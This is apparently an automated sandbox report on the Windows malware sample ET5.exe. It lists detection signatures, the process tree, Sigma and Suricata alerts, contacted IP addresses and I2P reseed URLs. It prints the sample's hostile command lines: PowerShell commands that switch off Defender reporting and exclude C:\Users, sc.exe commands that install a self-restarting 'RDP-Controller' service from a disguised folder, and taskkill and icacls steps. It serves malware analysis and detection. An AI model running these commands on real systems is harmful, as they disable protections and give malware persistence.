Windows Analysis Report
ET5.exe

Overview

General Information

Sample name: ET5.exe
Analysis ID: 1570047
MD5: 98c7ec9eb9c760e176a78a01bcb9f91c
SHA1: f88a8f1c1be4d07dafb27c65d36217eea4125020
SHA256: e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
Tags: exe, user-aachum

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • ET5.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\ET5.exe" MD5: 98C7EC9EB9C760E176A78A01BCB9F91C)
  • ET5.exe (PID: 6300 cmdline: C:\Users\user\Desktop\ET5.exe MD5: 98C7EC9EB9C760E176A78A01BCB9F91C)
    • cmd.exe (PID: 4980 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6544 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7060 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4676 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe" MD5: 2F829F1CB631D234C54F2E6C6F72EB57)
      • taskkill.exe (PID: 5972 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3780 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 6020 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5880 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5136 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 4816 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 7164 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hstmhco83f64lehv4q0wbzqj3o.exe (PID: 5760 cmdline: "C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)
  • main.exe (PID: 1524 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 1524, ProcessName: main.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4980, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 6544, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, ParentProcessId: 6128, ParentProcessName: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6020, ProcessName: sc.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 23.137.250.43, DestinationIsIpv6: false, DestinationPort: 24642, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 1524, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49868
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4980, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 4676, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, ParentProcessId: 6128, ParentProcessName: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6020, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4980, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 6544, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T14:21:23.373965+0100 | 2009208 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 65.191.158.5 | 22146 | UDP
2024-12-06T14:21:56.324082+0100 | 2009208 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 135.181.195.240 | 30302 | UDP
2024-12-06T14:22:36.588670+0100 | 2009208 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 2.178.163.167 | 30497 | UDP
2024-12-06T14:23:25.963992+0100 | 2009208 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 120.155.52.253 | 16538 | UDP
2024-12-06T14:23:37.027464+0100 | 2009208 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 45.61.165.224 | 15027 | UDP
2024-12-06T14:21:23.373929+0100 | 2009205 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 72.221.27.46 | 19892 | UDP
2024-12-06T14:22:09.417128+0100 | 2009205 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 73.195.118.76 | 23154 | UDP
2024-12-06T14:23:02.682528+0100 | 2009205 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 45.8.159.106 | 17893 | UDP
2024-12-06T14:23:09.715340+0100 | 2009205 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 5.187.75.159 | 65351 | UDP
2024-12-06T14:21:20.215395+0100 | 2009206 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 62.113.245.76 | 18771 | UDP
2024-12-06T14:21:57.323517+0100 | 2009206 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 118.178.193.220 | 11030 | UDP
2024-12-06T14:22:35.589495+0100 | 2009206 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 174.2.11.191 | 17369 | UDP
2024-12-06T14:23:21.838808+0100 | 2009206 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 101.184.38.180 | 14558 | UDP
2024-12-06T14:21:15.965055+0100 | 2009207 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 122.18.238.134 | 11749 | UDP
2024-12-06T14:21:49.325449+0100 | 2009207 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 89.117.55.228 | 16717 | UDP
2024-12-06T14:22:27.577527+0100 | 2009207 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 23.137.250.43 | 24642 | UDP
2024-12-06T14:23:04.733458+0100 | 2009207 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 101.184.38.180 | 14558 | UDP
2024-12-06T14:23:19.840083+0100 | 2009207 | 1 | A Network Trojan was detected | 192.168.2.5 | 27080 | 102.130.123.16 | 23055 | UDP

AV Detection

Source: https://netdb.i2p2.no/Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/Avira URL Cloud: Label: malware
Source: https://reseed.diva.exchange/Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeAvira: detection malicious, Label: TR/AVI.Agent.jibab
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeReversingLabs: Detection: 66%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: Binary string: RfxVmt.pdb source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr
Source: Binary string: RfxVmt.pdbGCTL source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, update.pkg.10.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B915387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exeCode function: 11_2_00007FF704893DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,11_2_00007FF704893DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708871CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF708871CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFAB31F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFAB31F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF70887737B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8B915A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8B9187DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BA50967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFAB9BBB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB5A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB8293B

Networking

Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000016.00000002.4536791919.000001B980E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000016.00000002.4542129953.00007FF8A8A84000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: update.pkg.10.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: gBXHuZY0.22.drString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: hstmhco83f64lehv4q0wbzqj3o.exe.2.drStatic PE information: Found NDIS imports: FwpmEngineClose0, FwpmEngineOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: unknownNetwork traffic detected: IP country count 18
Source: global trafficTCP traffic: 192.168.2.5:49704 -> 45.202.33.26:1128
Source: global trafficTCP traffic: 192.168.2.5:49868 -> 23.137.250.43:24642
Source: global trafficTCP traffic: 192.168.2.5:49869 -> 101.184.38.180:14558
Source: global trafficTCP traffic: 192.168.2.5:49870 -> 66.130.28.102:9823
Source: global trafficTCP traffic: 192.168.2.5:49871 -> 65.191.158.5:22146
Source: global trafficTCP traffic: 192.168.2.5:49940 -> 154.216.20.137:41674
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 122.18.238.134:11749
Source: Network trafficSuricata IDS: 2009206 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4) : 192.168.2.5:27080 -> 62.113.245.76:18771
Source: Network trafficSuricata IDS: 2009205 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1) : 192.168.2.5:27080 -> 72.221.27.46:19892
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 65.191.158.5:22146
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 89.117.55.228:16717
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 135.181.195.240:30302
Source: Network trafficSuricata IDS: 2009206 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4) : 192.168.2.5:27080 -> 118.178.193.220:11030
Source: Network trafficSuricata IDS: 2009205 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1) : 192.168.2.5:27080 -> 73.195.118.76:23154
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 23.137.250.43:24642
Source: Network trafficSuricata IDS: 2009206 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4) : 192.168.2.5:27080 -> 174.2.11.191:17369
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 2.178.163.167:30497
Source: Network trafficSuricata IDS: 2009205 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1) : 192.168.2.5:27080 -> 45.8.159.106:17893
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 102.130.123.16:23055
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 120.155.52.253:16538
Source: Network trafficSuricata IDS: 2009207 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5) : 192.168.2.5:27080 -> 101.184.38.180:14558
Source: Network trafficSuricata IDS: 2009205 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1) : 192.168.2.5:27080 -> 5.187.75.159:65351
Source: Network trafficSuricata IDS: 2009206 - Severity 1 - ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4) : 192.168.2.5:27080 -> 101.184.38.180:14558
Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.5:27080 -> 45.61.165.224:15027
Source: unknownTCP traffic detected without corresponding DNS query: 45.202.33.26
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9152A1A recv,WSAGetLastError,22_2_00007FF8B9152A1A
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.10.drString found in binary or memory: http://127.0.0.1:8118
